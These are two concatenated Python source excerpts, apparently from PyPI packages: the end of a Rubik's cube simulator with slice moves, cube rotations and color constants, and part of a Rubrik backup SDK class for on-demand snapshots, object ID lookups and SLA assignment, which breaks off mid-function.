self.faces['RIGHT_FACE'] = np.rot90(self.faces['RIGHT_FACE'])
temp = self.faces['UP_FACE'][:,2].copy()
self.faces['UP_FACE'][:,2] = np.flip(self.faces['BACK_FACE'][:,0])
self.faces['BACK_FACE'][:,0] = np.flip(self.faces['DOWN_FACE'][:,2])
self.faces['DOWN_FACE'][:,2] = self.faces['FRONT_FACE'][:,2]
self.faces['FRONT_FACE'][:,2] = temp
def move_middle(self):
"""Middle Slice Move
"""
if self.is_well_formed():
temp = self.faces['DOWN_FACE'][:,1].copy()
self.faces['DOWN_FACE'][:,1] = self.faces['FRONT_FACE'][:,1]
self.faces['FRONT_FACE'][:,1] = self.faces['UP_FACE'][:,1]
self.faces['UP_FACE'][:,1] = np.flip(self.faces['BACK_FACE'][:,1])
self.faces['BACK_FACE'][:,1] = np.flip(temp)
def move_middle_inverse(self):
"""Middle Slice Inverse Move
"""
if self.is_well_formed():
temp = self.faces['DOWN_FACE'][:,1].copy()
self.faces['DOWN_FACE'][:,1] = np.flip(self.faces['BACK_FACE'][:,1])
self.faces['BACK_FACE'][:,1] = np.flip(self.faces['UP_FACE'][:,1])
self.faces['UP_FACE'][:,1] = self.faces['FRONT_FACE'][:,1]
self.faces['FRONT_FACE'][:,1] = temp
def move_equator(self):
"""Equator Slice Move
"""
if self.is_well_formed():
temp = self.faces['FRONT_FACE'][1,:].copy()
self.faces['FRONT_FACE'][1,:] = self.faces['LEFT_FACE'][1,:]
self.faces['LEFT_FACE'][1,:] = self.faces['BACK_FACE'][1,:]
self.faces['BACK_FACE'][1,:] = self.faces['RIGHT_FACE'][1,:]
self.faces['RIGHT_FACE'][1,:] = temp
def move_equator_inverse(self):
"""Equator Slice Inverse Move
"""
if self.is_well_formed():
temp = self.faces['FRONT_FACE'][1,:].copy()
self.faces['FRONT_FACE'][1,:] = self.faces['RIGHT_FACE'][1,:]
self.faces['RIGHT_FACE'][1,:] = self.faces['BACK_FACE'][1,:]
self.faces['BACK_FACE'][1,:] = self.faces['LEFT_FACE'][1,:]
self.faces['LEFT_FACE'][1,:] = temp
def move_standing(self):
"""Standing Slice Move
"""
if self.is_well_formed():
temp = self.faces['UP_FACE'][1,:].copy()
self.faces['UP_FACE'][1,:] = np.flip(self.faces['LEFT_FACE'][:,1])
self.faces['LEFT_FACE'][:,1] = self.faces['DOWN_FACE'][1,:]
self.faces['DOWN_FACE'][1,:] = np.flip(self.faces['RIGHT_FACE'][:,1])
self.faces['RIGHT_FACE'][:,1] = temp
def move_standing_inverse(self):
"""Standing Slice Inverse Move
"""
if self.is_well_formed():
temp = self.faces['UP_FACE'][1,:].copy()
self.faces['UP_FACE'][1,:] = self.faces['RIGHT_FACE'][:,1]
self.faces['RIGHT_FACE'][:,1] = np.flip(self.faces['DOWN_FACE'][1,:])
self.faces['DOWN_FACE'][1,:] = self.faces['LEFT_FACE'][:,1]
self.faces['LEFT_FACE'][:,1] = np.flip(temp)
def rotate_pitch(self):
"""Pitch Rotation
"""
if self.is_well_formed():
self.move_left_inverse()
self.move_middle_inverse()
self.move_right()
def rotate_pitch_inverse(self):
"""Pitch Inverse Rotation
"""
if self.is_well_formed():
self.move_left()
self.move_middle()
self.move_right_inverse()
def rotate_roll(self):
"""Roll Rotation
"""
if self.is_well_formed():
self.move_front()
self.move_standing()
self.move_back_inverse()
def rotate_roll_inverse(self):
"""Roll Inverse Rotation
"""
if self.is_well_formed():
self.move_front_inverse()
self.move_standing_inverse()
self.move_back()
def rotate_yaw(self):
"""Yaw Rotation
"""
if self.is_well_formed():
self.move_up()
self.move_equator_inverse()
self.move_down_inverse()
def rotate_yaw_inverse(self):
"""Yaw Inverse Rotation
"""
if self.is_well_formed():
self.move_up_inverse()
self.move_equator()
self.move_down()
#==========================================================================
# CONSTANTS FOR DEFAULT CUBE-COLORS
#==========================================================================
DEFAULT_UP_COLOR = '#ffffff' # White
DEFAULT_DOWN_COLOR = '#ffd500' # Cyber Yellow
DEFAULT_FRONT_COLOR = '#009b48' # Green (Pigment)
DEFAULT_BACK_COLOR = '#0045ad' # Cobalt Blue
DEFAULT_LEFT_COLOR = '#ff5900' # Orange (Pantone)
DEFAULT_RIGHT_COLOR = '#b90000' # UE Red
DEFAULT_FACE_COLORS = {
'UP_COLOR' : DEFAULT_UP_COLOR,
'DOWN_COLOR' : DEFAULT_DOWN_COLOR,
'FRONT_COLOR' : DEFAULT_FRONT_COLOR,
'BACK_COLOR' : DEFAULT_BACK_COLOR,
'LEFT_COLOR' : DEFAULT_LEFT_COLOR,
'RIGHT_COLOR' : DEFAULT_RIGHT_COLOR
}
DEFAULT_UP_FACE = np.full((3,3), DEFAULT_UP_COLOR)
DEFAULT_DOWN_FACE = np.full((3,3), DEFAULT_DOWN_COLOR)
DEFAULT_FRONT_FACE = np.full((3,3), DEFAULT_FRONT_COLOR)
DEFAULT_BACK_FACE = np.full((3,3), DEFAULT_BACK_COLOR)
DEFAULT_LEFT_FACE = np.full((3,3), DEFAULT_LEFT_COLOR)
DEFAULT_RIGHT_FACE = np.full((3,3), DEFAULT_RIGHT_COLOR)
DEFAULT_FACES = {
'UP_FACE' : DEFAULT_UP_FACE,
'DOWN_FACE' : DEFAULT_DOWN_FACE,
'FRONT_FACE' : DEFAULT_FRONT_FACE,
'BACK_FACE' : DEFAULT_BACK_FACE,
'LEFT_FACE' : DEFAULT_LEFT_FACE,
'RIGHT_FACE' : DEFAULT_RIGHT_FACE
} | /rubix_cube-0.1.9.tar.gz/rubix_cube-0.1.9/rubix_cube/cube.py | 0.73678 | 0.41484 | cube.py | pypi |
import re
from datetime import datetime
from .api import Api
from .exceptions import CDMVersionException, InvalidParameterException, InvalidTypeException, APICallException
import inspect
class Data_Management(Api):
"""This class contains methods related to backup and restore operations for the various objects managed by the Rubrik cluster."""
def on_demand_snapshot(self, object_name, object_type, sla_name='current', fileset=None, host_os=None, sql_host=None, sql_instance=None, sql_db=None, hostname=None, force_full=False, share_type=None, timeout=15): # pylint: ignore
"""Initiate an on-demand snapshot.
Arguments:
object_name {str} -- The name of the Rubrik object to take a on-demand snapshot of.
object_type {str} -- The Rubrik object type you want to backup. (choices: {vmware, physical_host, ahv, mssql_db, oarcle_db})
Keyword Arguments:
sla_name {str} -- The SLA Domain name you want to assign the on-demand snapshot to. By default, the currently assigned SLA Domain will be used. (default: {'current'})
fileset {str} -- The name of the Fileset you wish to backup. Only required when taking a on-demand snapshot of a physical host or share. (default: {'None'})
host_os {str} -- The operating system for the physical host. Only required when taking a on-demand snapshot of a physical host. (default: {'None'}) (choices: {Linux, Windows})
hostname {str} -- Required when the object_type is either oracle_db or share. When oracle_db is the object_type, this argument corresponds to the host name, or one of those host names in the cluster that the Oracle database is running. When share is the object_type this argument corresponds to the NAS server host name.
force_full {bool} -- If True will force a new full image backup of an Oracle database. (default: {False})
share_type {str} -- The type of NAS share i.e. NFS or SMB. Only required when taking a snapshot of a Share.
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
tuple -- When object_type is vmware, the full API response for `POST /v1/vmware/vm/{ID}/snapshot` and the job status URL which can be used to monitor progress of the snapshot. (api_response, job_status_url)
tuple -- When object_type is physical_host, the full API response for `POST /v1/fileset/{}/snapshot` and the job status URL which can be used to monitor progress of the snapshot. (api_response, job_status_url)
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_object_type = ['vmware', 'physical_host',
'ahv', 'mssql_db', 'oracle_db', 'share']
valid_host_os_type = ['Linux', 'Windows']
if object_type not in valid_object_type:
raise InvalidParameterException("The on_demand_snapshot() `object_type` argument must be one of the following: {}.".format(
valid_object_type))
if host_os is not None:
if host_os not in valid_host_os_type:
raise InvalidParameterException("The on_demand_snapshot() `host_os` argument must be one of the following: {}.".format(
valid_host_os_type))
if object_type == 'vmware':
self.log("on_demand_snapshot: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
if sla_name == 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the vSphere VM '{}'.".format(object_name))
vm_summary = self.get(
'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
sla_id = vm_summary['effectiveSlaDomainId']
elif sla_name != 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
config = {}
config['slaId'] = sla_id
self.log("on_demand_snapshot: Initiating snapshot for the vSphere VM '{}'.".format(
object_name))
api_request = self.post(
'v1', '/vmware/vm/{}/snapshot'.format(vm_id), config, timeout)
snapshot_status_url = api_request['links'][0]['href']
elif object_type == 'ahv':
self.log("on_demand_snapshot: Searching the Rubrik cluster for the AHV VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
if sla_name == 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the AHV VM '{}'.".format(object_name))
vm_summary = self.get(
'internal', '/nutanix/vm/{}'.format(vm_id), timeout)
sla_id = vm_summary['effectiveSlaDomainId']
elif sla_name != 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
config = {}
config['slaId'] = sla_id
self.log("on_demand_snapshot: Initiating snapshot for the AHV VM '{}'.".format(
object_name))
api_request = self.post(
'internal', '/nutanix/vm/{}/snapshot'.format(vm_id), config, timeout)
snapshot_status_url = api_request['links'][0]['href']
elif object_type == 'mssql_db':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the MS SQL '{}'.".format(object_name))
mssql_host = self.object_id(
sql_host, 'physical_host', timeout=timeout)
mssql_instance = self.get(
'v1', '/mssql/instance?primary_cluster_id=local&root_id={}'.format(mssql_host), timeout)
for instance in mssql_instance['data']:
if instance['name'] == sql_instance:
sql_db_id = instance['id']
mssql_db = self.get(
'v1', '/mssql/db?primary_cluster_id=local&instance_id={}'.format(sql_db_id), timeout)
for db in mssql_db['data']:
if db['name'] == sql_db:
mssql_id = db['id']
if sla_name == 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the MS SQL '{}'.".format(object_name))
mssql_summary = self.get(
'v1', '/mssql/db/{}'.format(mssql_id), timeout)
sla_id = mssql_summary['effectiveSlaDomainId']
elif sla_name != 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
config = {}
config['slaId'] = sla_id
self.log("on_demand_snapshot: Initiating snapshot for the MS SQL '{}'.".format(
object_name))
api_request = self.post(
'v1', '/mssql/db/{}/snapshot'.format(mssql_id), config, timeout)
snapshot_status_url = api_request['links'][0]['href']
elif object_type == 'physical_host':
if host_os is None:
raise InvalidParameterException(
"The on_demand_snapshot() `host_os` argument must be populated when taking a Physical host snapshot.")
elif fileset is None:
raise InvalidParameterException(
"The on_demand_snapshot() `fileset` argument must be populated when taking a Physical host snapshot.")
self.log("on_demand_snapshot: Searching the Rubrik cluster for the Physical Host '{}'.".format(
object_name))
host_id = self.object_id(object_name, object_type, timeout=timeout)
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the Fileset Template '{}'.".format(fileset))
fileset_template_id = self.object_id(
fileset, 'fileset_template', host_os, timeout=timeout)
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the full Fileset.")
api_endpoint = '/fileset?primary_cluster_id=local&host_id={}&is_relic=false&template_id={}'.format(
host_id, fileset_template_id)
fileset_summary = self.get('v1', api_endpoint, timeout=timeout)
if fileset_summary['total'] == 0:
raise InvalidParameterException(
"The Physical Host '{}' is not assigned to the '{}' Fileset.".format(
object_name, fileset))
fileset_id = fileset_summary['data'][0]['id']
if sla_name == 'current':
sla_id = fileset_summary['data'][0]['effectiveSlaDomainId']
elif sla_name != 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
config = {}
config['slaId'] = sla_id
self.log("on_demand_snapshot: Initiating snapshot for the Physical Host '{}'.".format(
object_name))
api_request = self.post(
'v1', '/fileset/{}/snapshot'.format(fileset_id), config, timeout)
snapshot_status_url = api_request['links'][0]['href']
elif object_type == 'oracle_db':
if hostname is None:
raise InvalidParameterException(
"You must provide the host or one of the hosts in a RAC cluster for the Oracle DB object.")
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the Oracle database '{}' on the host '{}'.".format(
object_name,
hostname))
db_id = self.object_id(
object_name, object_type, hostname=hostname, timeout=timeout)
if sla_name == 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the Oracle database '{}'.".format(
object_name))
oracle_db_summary = self.get(
'internal', '/oracle/db/{}'.format(db_id), timeout)
sla_id = oracle_db_summary['effectiveSlaDomainId']
elif sla_name != 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
config = {}
config['slaId'] = sla_id
config['forceFullSnapshot'] = force_full
self.log("on_demand_snapshot: Initiating snapshot for the Oracle database '{}'.".format(
object_name))
api_request = self.post(
'internal', '/oracle/db/{}/snapshot'.format(db_id), config, timeout)
snapshot_status_url = api_request['links'][0]['href']
elif object_type == 'share':
if hostname is None:
raise InvalidParameterException(
"The on_demand_snapshot() `hostname` argument must be populated when taking a NAS Share fileset snapshot.")
elif fileset is None:
raise InvalidParameterException(
"The on_demand_snapshot() `fileset` argument must be populated when taking a NAS Share fileset snapshot.")
elif share_type is None:
raise InvalidParameterException(
"The on_demand_snapshot() `share_type` argument must be populated when taking a NAS Share fileset snapshot.")
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the NAS Host '{}'.".format(hostname))
host_id = self.object_id(
hostname, 'physical_host', timeout=timeout)
self.log("on_demand_snapshot: Searching the Rubrik cluster for the NAS share '{}'.".format(
object_name))
share_id = self.object_id(
object_name, 'share', hostname=hostname, share_type=share_type, timeout=timeout)
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the full Fileset.")
api_endpoint = '/fileset?share_id={}&host_id={}&is_relic=false&name={}'.format(
share_id, host_id, fileset)
fileset_summary = self.get('v1', api_endpoint, timeout=timeout)
if fileset_summary['total'] == 0:
raise InvalidParameterException(
"The NAS Share '{}' is not assigned to the '{}' Fileset.".format(
object_name, fileset))
fileset_id = fileset_summary['data'][0]['id']
if sla_name == 'current':
sla_id = fileset_summary['data'][0]['effectiveSlaDomainId']
elif sla_name != 'current':
self.log(
"on_demand_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
config = {}
config['slaId'] = sla_id
self.log(
"on_demand_snapshot: Initiating snapshot for the NAS Share '{}' Fileset '{}'.".format(
object_name, fileset))
api_request = self.post(
'v1', '/fileset/{}/snapshot'.format(fileset_id), config, timeout)
snapshot_status_url = api_request['links'][0]['href']
return (api_request, snapshot_status_url)
def object_id(self, object_name, object_type, host_os=None, hostname=None, share_type=None, mssql_host=None, mssql_instance=None, timeout=15):
"""Get the ID of a Rubrik object by providing its name.
Arguments:
object_name {str} -- The name of the Rubrik object whose ID you wish to lookup.
object_type {str} -- The object type you wish to look up. (choices: {vmware, sla, vmware_host, physical_host, fileset_template, managed_volume, mssql_db, mssql_instance, mssql_availability_group, vcenter, ahv, aws_native, oracle_db, oracle_host, volume_group, archival_location, share, organization, organization_role_id, organization_admin_role})
Keyword Arguments:
host_os {str} -- The operating system for the host. Required when object_type is 'fileset_template'. (default: {None}) (choices: {Windows, Linux})
hostname {str} -- The Oracle hostname, Oracle RAC cluster name, or one of the hostnames in the Oracle RAC cluster. Required when the object_type is oracle_db or share. Using the IP is not supported.
share_type {str} -- The type of NAS share i.e. NFS or SMB
mssql_host {str} -- The name of a MSSQL Host. Required when the object_type is mssql_db or mssql_instance.
mssql_instance {str} -- The name of a MSSQL database instance. Required when the object_type is mssql_db.
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
str -- The ID of the provided Rubrik object.
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
valid_object_type = [
'vmware',
'sla',
'vmware_host',
'physical_host',
'fileset_template',
'managed_volume',
'mssql_db',
'mssql_instance',
'mssql_availability_group',
'vcenter',
'ahv',
'aws_native',
'oracle_db',
'oracle_host',
'volume_group',
'archival_location',
'share',
'organization',
'organization_role_id',
'organization_admin_role']
if object_type not in valid_object_type:
raise InvalidParameterException("The object_id() object_type argument must be one of the following: {}.".format(
valid_object_type))
if object_type == 'fileset_template':
if host_os is None:
raise InvalidParameterException(
"You must provide the Fileset Template OS type.")
elif host_os not in ['Linux', 'Windows']:
raise InvalidParameterException(
"The host_os must be either 'Linux' or 'Windows'.")
if object_type == 'sla':
if object_name.upper() == "FOREVER" or object_name.upper() == "UNPROTECTED":
return "UNPROTECTED"
if object_type == 'oracle_db':
if hostname is None:
raise InvalidParameterException(
"You must provide the hostname, the RAC cluster name, or one of the hosts in the RAC cluster for the Oracle DB object.")
# Regular expression to test for an IP Address.
regex = '''^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(
25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(
25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(
25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)'''
# Check to make sure the hostname is not an IP address.
if re.search(regex, hostname):
raise InvalidParameterException(
"You must provide the hostname, RAC cluster name or one of the hosts in a RAC cluster for the Oracle DB object. Using an IP address is not supported.")
# Remove the domain name if present. Hostnames may be stored with and without domain names. Using just the hostname for a consistent match.
hostname = hostname.split('.')[0]
if object_type == 'share':
if hostname is None:
raise InvalidParameterException(
"You must provide the 'hostname' with the NAS share object.")
if share_type is None:
raise InvalidParameterException(
"You must provide the 'share_type' with the NAS share object.")
else:
self.log('Searching the Rubrik cluster for the host ID.')
host_id = self.object_id(
hostname, 'physical_host', timeout=timeout)
api_call = {
"vmware": {
"api_version": "v1",
"api_endpoint": "/vmware/vm?primary_cluster_id=local&is_relic=false&name={}".format(object_name)
},
"sla": {
"api_version": "v1",
"api_endpoint": "/sla_domain?primary_cluster_id=local&name={}".format(object_name)
},
"vmware_host": {
"api_version": "v1",
"api_endpoint": "/vmware/host?primary_cluster_id=local"
},
"fileset_template": {
"api_version": "v1",
"api_endpoint": "/fileset_template?primary_cluster_id=local&operating_system_type={}&name={}".format(host_os, object_name)
},
"managed_volume": {
"api_version": "internal",
"api_endpoint": "/managed_volume?is_relic=false&primary_cluster_id=local&name={}".format(object_name)
},
"ahv": {
"api_version": "internal",
"api_endpoint": "/nutanix/vm?primary_cluster_id=local&is_relic=false&name={}".format(object_name)
},
"aws_native": {
"api_version": "internal",
"api_endpoint": "/aws/account?name={}".format(object_name)
},
"vcenter": {
"api_version": "v1",
"api_endpoint": "/vmware/vcenter?primary_cluster_id=local"
},
"oracle_db": {
"api_version": "internal",
"api_endpoint": "/oracle/db?name={}".format(object_name)
},
"oracle_host": {
"api_version": "internal",
"api_endpoint": "/oracle/hierarchy/root/children?name={}".format(object_name)
},
"volume_group": {
"api_version": "internal",
"api_endpoint": "/volume_group?is_relic=false"
},
"archival_location": {
"api_version": "internal",
"api_endpoint": "/archive/location?name={}".format(object_name)
},
"share": {
"api_version": "internal",
"api_endpoint": "/host/share?share_type={}".format(share_type)
},
"organization": {
"api_version": "internal",
"api_endpoint": "/organization?name={}".format(object_name)
},
"organization_role_id": {
"api_version": "internal",
"api_endpoint": "/organization?name={}".format(object_name)
},
"mssql_availability_group": {
"api_version": "v1",
"api_endpoint": "/mssql/hierarchy/root/children?has_instances=false&is_clustered=false&is_live_mount=false&limit=51&object_type=MssqlAvailabilityGroup&offset=0&primary_cluster_id=local&snappable_status=Protectable&name={}".format(object_name)
}
}
if object_type == 'physical_host':
if self.minimum_installed_cdm_version(5.0, timeout) is True:
filter_field_name = "name"
else:
filter_field_name = "hostname"
api_call["physical_host"] = {
"api_version": "v1",
"api_endpoint": "/host?primary_cluster_id=local&{}={}".format(filter_field_name, object_name)
}
if object_type == 'mssql_instance':
if mssql_host is None:
raise InvalidParameterException(
"You must provide a mssql_host when the object_type is mssql_instance.")
# root_id is host_id in SQL speak
root_id = self.object_id(mssql_host, 'physical_host')
api_call["mssql_instance"] = {
"api_version": "v1",
"api_endpoint": "/mssql/instance?primary_cluster_id=local&root_id={}".format(root_id)
}
if object_type == 'mssql_db':
if mssql_instance is None or mssql_host is None:
raise InvalidParameterException(
"You must provide a mssql_host and mssql_instance when the object_type is mssql_db.")
instance_id = self.object_id(
mssql_instance, "mssql_instance", mssql_host=mssql_host)
api_call["mssql_db"] = {
"api_version": "v1",
"api_endpoint": "/mssql/db?primary_cluster_id=local&is_relic=false&name={}&instance_id={}".format(object_name, instance_id)
}
# When looking up the org_admin_role the user should provide the org name
# as the object_name. We then use that to look up the id for the org and
# then set that as the "object_type" for the full org_admin_role query
if object_type == "organization_admin_role":
self.log(
"object_id: Getting the ID for the {} organization.".format(object_name))
org_role_id = self.object_id(
object_name, "organization_role_id", timeout=timeout)
api_call["organization_admin_role"] = {
"api_version": "internal",
"api_endpoint": "/role/{}/authorization".format(org_role_id)
}
self.log("object_id: Getting the object id for the {} object '{}'.".format(
object_type, object_name))
api_request = self.get(
api_call[object_type]["api_version"],
api_call[object_type]["api_endpoint"],
timeout=timeout)
object_ids = []
if object_type == "organization_admin_role":
object_ids.append(api_request["roleId"])
else:
if api_request['total'] == 0:
raise InvalidParameterException("The {} object '{}' was not found on the Rubrik cluster.".format(
object_type, object_name))
elif api_request['total'] > 0:
# Define the "object name" to search for
if object_type == 'physical_host':
name_value = filter_field_name
elif object_type == "volume_group":
name_value = "hostname"
elif object_type == 'share':
name_value = "exportPoint"
else:
name_value = 'name'
for item in api_request['data']:
if object_type == 'oracle_db':
if 'standaloneHostName' in item.keys():
if hostname == item['standaloneHostName'].split('.')[0]:
object_ids.append(item['id'])
break
elif 'racName' in item.keys():
if hostname == item['racName']:
object_ids.append(item['id'])
break
if any(instance['hostName'] == hostname for instance in item['instances']):
object_ids.append(item['id'])
break
elif object_type == 'share' and item[name_value] == object_name:
if item['hostId'] == host_id:
object_ids.append(item['id'])
elif object_type == "organization_role_id" and item[name_value].lower():
object_ids.append(item['roleId'])
elif item[name_value].lower() == object_name.lower():
object_ids.append(item['id'])
if len(object_ids) > 1:
raise InvalidParameterException(
"Multiple {} objects named '{}' were found on the Rubrik cluster. Unable to return a specific object id.".format(object_type, object_name))
elif len(object_ids) == 0:
raise InvalidParameterException(
"The {} object '{}' was not found on the Rubrik cluster.".format(object_type, object_name))
else:
return object_ids[0]
raise InvalidParameterException(
"The {} object '{}' was not found on the Rubrik cluster.".format(object_type, object_name))
def assign_sla(self, object_name, sla_name, object_type, log_backup_frequency_in_seconds=None, log_retention_hours=None, copy_only=None, windows_host=None, nas_host=None, share=None, log_backup_frequency_in_minutes=None, num_channels=4, hostname=None, timeout=30): # pytest: ignore
"""Assign a Rubrik object to an SLA Domain.
Arguments:
object_name {str or list} -- The name of the Rubrik object you wish to assign to an SLA Domain. When the 'object_type' is 'volume_group', the object_name can be a list of volumes.
sla_name {str} -- The name of the SLA Domain you wish to assign an object to. To exclude the object from all SLA assignments use `do not protect` as the `sla_name`. To assign the selected object to the SLA of the next higher level object use `clear` as the `sla_name`.
object_type {str} -- The Rubrik object type you want to assign to the SLA Domain. (choices: {ahv, mssql_host, oracle_host, vmware, volume_group})
Keyword Arguments:
log_backup_frequency_in_seconds {int} -- The MSSQL Log Backup frequency you'd like to specify with the SLA. Required when the `object_type` is `mssql_host`. (default {None})
log_retention_hours {int} -- The MSSQL or Oracle Log Retention frequency you'd like to specify with the SLA. Required when the `object_type` is `mssql_host`, `oracle_db` or 'oracle_host'. (default {None})
copy_only {bool} -- Take Copy Only Backups with MSSQL. Required when the `object_type` is `mssql_host`. (default {None})
windows_host {str} -- The name of the Windows host that contains the relevant volume group. Required when the `object_type` is `volume_group`. (default {None})
nas_host {str} -- The name of the NAS host that contains the relevant share. Required when the `object_type` is `fileset`. (default {None})
share {str} -- The name of the network share a fileset will be created for. Required when the `object_type` is `fileset`. (default {None})
log_backup_frequency_in_minutes {int} - The Oracle Log Backup frequency you'd like to specify with the SLA. Required when the `object_type` is `oracle_db` or `oracle_host`. (default {None})
num_channels {int} - Number of RMAN channels used to backup the Oracle database. Required when the `object_type` is `oracle_host`. (default {"4""})
hostname {str} -- The hostname, or one of the hostnames in a RAC cluster, or the RAC cluster name. Required when the object_type is `oracle_db`. (default {None})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. The vSphere VM '`object_name`' is already assigned to the '`sla_name`' SLA Domain.
str -- No change required. The MSSQL Instance '`object_name`' is already assigned to the '`sla_name`' SLA Domain with the following log settings: log_backup_frequency_in_seconds: `log_backup_frequency_in_seconds`, log_retention_hours: `log_retention_hours` and copy_only: `copy_only`
str -- No change required. The Oracle Database '`object_name`' is already assigned to the '`sla_name`' SLA Domain with the following log settings: log_backup_frequency_in_minutes: `log_backup_frequency_in_seconds`, log_retention_hours: `log_retention_hours` and num_channels: `num_channels`.
str -- No change required. The Oracle Host '`object_name`' is already assigned to the '`sla_name`' SLA Domain with the following log settings: log_backup_frequency_in_seconds: `log_backup_frequency_in_seconds`. log_retention_hours: `log_retention_hours`, and num_channels: `num_channels`
str -- No change required. The '`object_name`' volume_group is already assigned to the '`sla_name`' SLA Domain.
dict -- The full API response for `POST /internal/sla_domain/{sla_id}/assign`.
dict -- The full API response for `PATCH /internal/volume_group/{id}`.
dict -- The full API response for `PATCH /internal/oracle/db/{id}.`
dict -- The full API response for `PATCH /internal/oracle/host/{id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_object_type = ['vmware', 'mssql_host', 'volume_group',
'fileset', 'ahv', 'oracle_db', 'oracle_host']
if object_type not in valid_object_type:
raise InvalidParameterException(
"The assign_sla() object_type argument must be one of the following: {}.".format(valid_object_type))
if object_type == "mssql_host":
if log_backup_frequency_in_seconds is None or log_retention_hours is None or copy_only is None:
raise InvalidParameterException(
"When the object_type is 'mssql_host' the 'log_backup_frequency_in_seconds', 'log_retention_hours', 'copy_only' paramaters must be populated.")
if object_type == "oracle_host":
if log_backup_frequency_in_minutes is None or log_retention_hours is None or num_channels is None:
raise InvalidParameterException(
"When the object_type is 'oracle_host' the 'log_backup_frequency_in_minutes', 'log_retention_hours', 'num_channels' paramaters must be populated.")
if object_type == "oracle_db":
if log_backup_frequency_in_minutes is None or log_retention_hours is None or num_channels is None or hostname is None:
raise InvalidParameterException(
"When the object_type is 'oracle_db' the 'log_backup_frequency_in_minutes', 'log_retention_hours', 'num_channels' and 'hostname' paramaters must be populated.")
if object_type == "fileset":
if nas_host is None or share is None:
raise InvalidParameterException(
"When the object_type is 'fileset' the 'nas_host' and 'share' paramaters must be populated.")
if object_type == "volume_group":
if not isinstance(object_name, (str, list)):
raise InvalidParameterException(
"When the object_type is 'volume_group', the 'object_name' must be a string or a list.")
if windows_host is None:
raise InvalidParameterException(
"When the object_type is 'volumge_group' the 'windows_host' paramater must be populated.")
else:
if not isinstance(object_name, (str)):
raise InvalidParameterException(
"The object_name must be a string.")
# Determine if 'do not protect' or 'clear' are the SLA Domain Name
do_not_protect_regex = re.findall(
'\\bdo not protect\\b', sla_name, flags=re.IGNORECASE)
clear_regex = re.findall('\\bclear\\b', sla_name, flags=re.IGNORECASE)
if len(do_not_protect_regex) > 0:
sla_id = "UNPROTECTED"
elif len(clear_regex) > 0:
sla_id = 'INHERIT'
else:
self.log(
"assign_sla: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
if object_type == 'vmware':
self.log("assign_sla: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
object_name))
vm_id = self.object_id(object_name, object_type, timeout=timeout)
self.log("assign_sla: Determing the SLA Domain currently assigned to the vSphere VM '{}'.".format(
object_name))
vm_summary = self.get(
'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)
if sla_id == vm_summary['configuredSlaDomainId']:
return "No change required. The vSphere VM '{}' is already assigned to the '{}' SLA Domain.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the vSphere VM '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
config['managedIds'] = [vm_id]
return self.post("internal", "/sla_domain/{}/assign".format(sla_id), config, timeout)
elif object_type == 'fileset':
self.log(
"assign_sla: Searching the Rubrik cluster for the NAS host '{}'.".format(nas_host))
host_id = self.object_id(
nas_host, 'physical_host', timeout=timeout)
self.log(
"assign_sla: Searching the Rubrik cluster for the share '{}'.".format(share))
share_summary = self.get(
"internal", '/host/share', timeout=timeout)
share_id = None
for shares in share_summary['data']:
if shares['hostId'] == host_id and shares['exportPoint'] == share:
share_id = shares['id']
if share_id is None:
raise InvalidParameterException(
"The share object'{}' does not exist for host '{}'.".format(
share, nas_host))
self.log("assign_sla: Searching the Rubrik cluster for the fileset '{}' template.".format(
object_name))
fileset_summary = self.get(
"v1", '/fileset?is_relic=false&name={}'.format(object_name), timeout=timeout)
template_id = None
for filesets in fileset_summary['data']:
if filesets['hostId'] == host_id and filesets['name'] == object_name:
template_id = filesets['templateId']
if template_id is None:
raise InvalidParameterException(
"The fileset '{}' template does not exist".format(object_name))
self.log(
